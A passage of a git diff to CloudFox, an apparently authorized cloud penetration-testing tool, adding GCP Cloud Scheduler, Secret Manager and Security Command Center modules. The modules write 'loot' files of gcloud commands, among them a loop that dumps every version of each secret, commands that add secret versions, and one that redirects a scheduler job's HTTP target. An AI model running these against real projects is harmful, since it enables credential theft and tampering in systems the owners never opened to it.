+ for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SchedulerModule) initializeLootFiles() { + m.LootMap["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { + target := formatTargetFull(job) + + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ + "# State: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Target: %s -> %s\n", + job.Name, job.ProjectID, job.Location, + job.State, + job.Schedule, job.TimeZone, + job.TargetType, target, + ) + + if job.ServiceAccount != "" { + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "\n# Describe job:\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# Run job immediately:\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ + "# Pause job:\n"+ + "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + if job.TargetType == "http" { + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", + job.Name, job.Location, job.ProjectID, + ) + } +} + +// ------------------------------ +// Output 
Generation +// ------------------------------ +func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Jobs table + header := []string{ + "Project Name", + "Project ID", + "Job Name", + "Location", + "State", + "Schedule", + "Target Type", + "Target", + "Service Account", + "Last Run", + } + + var body [][]string + for _, job := range m.Jobs { + // Format target - full, no truncation + target := formatTargetFull(job) + + // Format service account - full, no truncation + sa := "-" + if job.ServiceAccount != "" { + sa = job.ServiceAccount + } + + // Format last run + lastRun := "-" + if job.LastAttemptTime != "" { + lastRun = job.LastAttemptTime + if job.Status != "" && job.Status != "OK" { + lastRun += " (FAILED)" + } + } + + body = append(body, []string{ + m.GetProjectName(job.ProjectID), + job.ProjectID, + job.Name, + job.Location, + job.State, + job.Schedule, + job.TargetType, + target, + sa, + lastRun, + }) + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := SchedulerOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// 
formatTargetFull formats the job target for display without truncation +func formatTargetFull(job SchedulerService.JobInfo) string { + switch job.TargetType { + case "http": + return job.TargetURI + case "pubsub": + return job.TargetTopic + case "appengine": + target := job.TargetService + if job.TargetVersion != "" { + target += "/" + job.TargetVersion + } + if job.TargetURI != "" { + target += job.TargetURI + } + if target == "" { + return "-" + } + return target + default: + return "-" + } +} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index f5c691c2..5fe5c4e5 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -1,120 +1,422 @@ package commands import ( + "context" "fmt" + "strings" + "sync" secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPSecretsCommand = &cobra.Command{ Use: globals.GCP_SECRETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP secrets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available secrets information: -cloudfox gcp secrets`, + Aliases: []string{"secretmanager", "sm"}, + Short: "Enumerate GCP Secret Manager secrets with security configuration", + Long: `Enumerate GCP Secret Manager secrets across projects with security-relevant details. 
+ +Features: +- Lists all secrets with metadata and security configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows replication configuration (automatic vs user-managed) +- Shows expiration and rotation settings +- Enumerates IAM policies per secret +- Generates gcloud commands for secret access +- Generates exploitation commands for secret extraction + +Security Columns: +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Replication: "automatic" or "user-managed" with locations +- Rotation: Whether automatic rotation is enabled +- Expiration: Whether the secret has an expiration time/TTL +- VersionDestroyTTL: Delayed destruction period for old versions`, Run: runGCPSecretsCommand, } -// GCPSecretsResults struct that implements the internal.OutputInterface -type GCPSecretsResults struct { - Data []SecretsService.SecretInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type SecretsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Secrets []SecretsService.SecretInfo + LootMap map[string]*internal.LootFile + client *secretmanager.Client + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type SecretsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -func (g GCPSecretsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o SecretsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecretsOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "CreationTime", - "Labels", - "Rotation", - "ProjectID", - // Add more fields as necessary +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecretsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err 
:= gcpinternal.InitializeCommandContext(cmd, globals.GCP_SECRETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, value := range g.Data { - body = append(body, []string{ - value.Name, - value.CreationTime, - fmt.Sprintf("%v", value.Labels), - value.Rotation, - value.ProjectID, - }) + // Create Secret Manager client + client, err := secretmanager.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Secret Manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + return } + defer client.Close() - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_SECRETS_MODULE_NAME, + // Create module instance + module := &SecretsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Secrets: []SecretsService.SecretInfo{}, + LootMap: make(map[string]*internal.LootFile), + client: client, } - tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Initialize loot files + module.initializeLootFiles() -func (g GCPSecretsResults) LootFiles() []internal.LootFile { - // Define any specific data considered as loot - return []internal.LootFile{} + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } -func runGCPSecretsCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_SECRETS_MODULE_NAME) +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) + + // 
Check results + if len(m.Secrets) == 0 { + logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(m.Secrets)), globals.GCP_SECRETS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *SecretsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating secrets in project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) } - client, err := secretmanager.NewClient(ctx) + // Create service and fetch secrets + ss := SecretsService.New(m.client) + secrets, err := ss.Secrets(projectID) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SECRETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate secrets in project %s", projectID)) return } - defer client.Close() - ss := SecretsService.New(client) - var results []SecretsService.SecretInfo - - // Set output params from parentCmd - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - result, err := ss.Secrets(projectID) - if err != nil { - logger.ErrorM(err.Error(), 
globals.GCP_SECRETS_MODULE_NAME) - return + // Thread-safe append + m.mu.Lock() + m.Secrets = append(m.Secrets, secrets...) + + // Generate loot for each secret + for _, secret := range secrets { + m.addSecretToLoot(secret) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d secret(s) in project %s", len(secrets), projectID), globals.GCP_SECRETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecretsModule) initializeLootFiles() { + m.LootMap["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SecretsModule) addSecretToLoot(secret SecretsService.SecretInfo) { + // Extract secret name from full path + secretName := getSecretShortName(secret.Name) + + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# ==========================================\n"+ + "# Encryption: %s, Replication: %s, Rotation: %s\n"+ + "# Created: %s\n", + secretName, secret.ProjectID, + secret.EncryptionType, secret.ReplicationType, secret.Rotation, + secret.CreationTime, + ) + + // KMS key info + if secret.KMSKeyName != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + } + + // Rotation info + if secret.Rotation == "enabled" { + if secret.RotationPeriod != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - cloudfoxOutput := GCPSecretsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_SECRETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + if secret.NextRotationTime != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_SECRETS_MODULE_NAME) + } + + // IAM bindings + if len(secret.IAMBindings) > 0 { + m.LootMap["secrets-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range secret.IAMBindings { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# %s: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + } + + // Commands + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "\n# Describe secret:\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "# List versions:\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n"+ + "# Add a new version:\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) +} + + +// 
------------------------------ +// Helper functions +// ------------------------------ + +// getSecretShortName extracts the short name from a full secret resource path +func getSecretShortName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// getSecretMemberType extracts the member type from a GCP IAM member string +func getSecretMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Combined table with IAM columns (one row per IAM member) + header := []string{ + "Project Name", + "Project ID", + "Name", + "Encryption", + "KMS Key", + "Replication", + "Rotation", + "Rotation Period", + "Next Rotation", + "Expiration", + "Destroy TTL", + "Created", + "IAM Role", + "Member Type", + "IAM Member", + } + + var body [][]string + for _, secret := range m.Secrets { + secretName := getSecretShortName(secret.Name) + + // Format expiration + expiration := "-" + if secret.HasExpiration { + if secret.ExpireTime != "" { + expiration = secret.ExpireTime + } else if secret.TTL != "" { + expiration = "TTL: " + 
secret.TTL + } + } + + // Format version destroy TTL + destroyTTL := "-" + if secret.VersionDestroyTTL != "" { + destroyTTL = secret.VersionDestroyTTL + } + + // Format KMS key (no truncation) + kmsKey := "-" + if secret.KMSKeyName != "" { + kmsKey = secret.KMSKeyName + } + + // Format rotation period + rotationPeriod := "-" + if secret.RotationPeriod != "" { + rotationPeriod = secret.RotationPeriod + } + + // Format next rotation + nextRotation := "-" + if secret.NextRotationTime != "" { + nextRotation = secret.NextRotationTime + } + + // One row per IAM member + if len(secret.IAMBindings) > 0 { + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := getSecretMemberType(member) + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Secret with no IAM bindings + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, 
len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go new file mode 100644 index 00000000..d6f28e07 --- /dev/null +++ b/gcp/commands/securitycenter.go @@ -0,0 +1,523 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" + +var GCPSecurityCenterCommand = &cobra.Command{ + Use: GCP_SECURITYCENTER_MODULE_NAME, + Aliases: []string{"scc", "security", "defender"}, + Hidden: true, + Short: "Enumerate Security Command Center findings and recommendations", + Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. 
+ +Features: +- Lists all active SCC findings by severity (CRITICAL, HIGH, MEDIUM, LOW) +- Shows vulnerable assets and their security issues +- Identifies security posture gaps +- Provides remediation recommendations +- Generates exploitation commands for penetration testing + +Requires Security Command Center API to be enabled and appropriate IAM permissions: +- roles/securitycenter.findingsViewer or roles/securitycenter.admin`, + Run: runGCPSecurityCenterCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type SCCFinding struct { + Name string + Category string + Severity string + State string + ResourceName string + ResourceType string + ProjectID string + Description string + CreateTime string + SourceDisplayName string + ExternalURI string +} + +type SCCAsset struct { + Name string + ResourceName string + ResourceType string + ProjectID string + FindingCount int + Severity string // Highest severity finding +} + +type SCCSource struct { + Name string + DisplayName string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SecurityCenterModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Findings []SCCFinding + Assets map[string]*SCCAsset // keyed by resource name + Sources []SCCSource + LootMap map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SecurityCenterOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SecurityCenterOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecurityCenterOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { + // Initialize command context 
+ cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_SECURITYCENTER_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &SecurityCenterModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Findings: []SCCFinding{}, + Assets: make(map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating Security Command Center findings...", GCP_SECURITYCENTER_MODULE_NAME) + + // Create Security Command Center client + client, err := securitycenter.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, "Failed to create client") + return + } + defer client.Close() + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, client, logger) + } + + // Check results + if len(m.Findings) == 0 { + logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + + // Count findings by severity + criticalCount := 0 + highCount := 0 + mediumCount := 0 + lowCount := 0 + for _, f := range m.Findings { + switch f.Severity { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + case "LOW": + lowCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", + len(m.Findings), criticalCount, highCount, 
mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SecurityCenterModule) processProject(ctx context.Context, projectID string, client *securitycenter.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) + } + + // List active findings for this project + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + // Create request to list findings + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, // Only active findings + } + + it := client.ListFindings(ctx, req) + + findingsCount := 0 + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Project %s", projectID)) + break + } + + finding := result.Finding + if finding == nil { + continue + } + + // Parse the finding + sccFinding := m.parseFinding(finding, projectID) + + m.mu.Lock() + m.Findings = append(m.Findings, sccFinding) + + // Track affected assets + if sccFinding.ResourceName != "" { + if asset, exists := m.Assets[sccFinding.ResourceName]; exists { + asset.FindingCount++ + // Update to highest severity + if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { + asset.Severity = sccFinding.Severity + } + } else { + m.Assets[sccFinding.ResourceName] = &SCCAsset{ + Name: sccFinding.ResourceName, + ResourceName: sccFinding.ResourceName, + ResourceType: sccFinding.ResourceType, + ProjectID: projectID, + FindingCount: 1, + Severity: sccFinding.Severity, + } + } + } + + // Add to loot files + 
m.addFindingToLoot(sccFinding, projectID) + m.mu.Unlock() + + findingsCount++ + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d finding(s) in project %s", findingsCount, projectID), GCP_SECURITYCENTER_MODULE_NAME) + } +} + +// parseFinding converts an SCC finding to our internal structure +func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, projectID string) SCCFinding { + sccFinding := SCCFinding{ + Name: finding.Name, + Category: finding.Category, + State: finding.State.String(), + ProjectID: projectID, + ResourceName: finding.ResourceName, + Description: finding.Description, + ExternalURI: finding.ExternalUri, + } + + // Parse severity + if finding.Severity != securitycenterpb.Finding_SEVERITY_UNSPECIFIED { + sccFinding.Severity = finding.Severity.String() + } else { + sccFinding.Severity = "UNSPECIFIED" + } + + // Parse resource type from resource name + if finding.ResourceName != "" { + parts := strings.Split(finding.ResourceName, "/") + if len(parts) >= 2 { + sccFinding.ResourceType = parts[len(parts)-2] + } + } + + // Get create time + if finding.CreateTime != nil { + sccFinding.CreateTime = finding.CreateTime.AsTime().Format("2006-01-02 15:04:05") + } + + // Parse source display name from finding name + if finding.Name != "" { + // Format: organizations/{org}/sources/{source}/findings/{finding} + // or projects/{project}/sources/{source}/findings/{finding} + parts := strings.Split(finding.Name, "/") + for i, part := range parts { + if part == "sources" && i+1 < len(parts) { + sccFinding.SourceDisplayName = parts[i+1] + break + } + } + } + + return sccFinding +} + +// severityRank returns a numeric rank for severity comparison +func severityRank(severity string) int { + switch severity { + case "CRITICAL": + return 4 + case "HIGH": + return 3 + case "MEDIUM": + return 2 + case "LOW": + return 1 + default: + return 0 + } +} + +// ------------------------------ +// Loot File 
Management +// ------------------------------ +func (m *SecurityCenterModule) initializeLootFiles() { + m.LootMap["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { + // Only add CRITICAL and HIGH severity findings to loot + if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { + return + } + + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "## Finding: %s (%s)\n"+ + "# Category: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n", + finding.Name, finding.Severity, + finding.Category, + finding.ResourceName, + projectID, + ) + + if finding.Description != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + } + + if finding.ExternalURI != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) + } + + // Add gcloud commands + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "\n# View finding details:\n"+ + "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", + projectID, finding.Name, + ) + + // Add specific commands based on category + categoryLower := strings.ToLower(finding.Category) + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Remove public access:\n"+ + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, + finding.ResourceName, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s 
--project=%s\n\n", + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# List service account keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", + finding.ResourceName, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort findings by severity + sort.Slice(m.Findings, func(i, j int) bool { + return severityRank(m.Findings[i].Severity) > severityRank(m.Findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Project Name", + "Project ID", + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range m.Findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + m.GetProjectName(f.ProjectID), + f.ProjectID, + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table + assetsHeader := []string{ + "Project Name", + "Project ID", + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + for _, asset := range m.Assets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.ProjectID, + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][4] > assetsBody[j][4] + }) + + // Collect loot files - only 
include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + output := SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/serviceaccounts.go 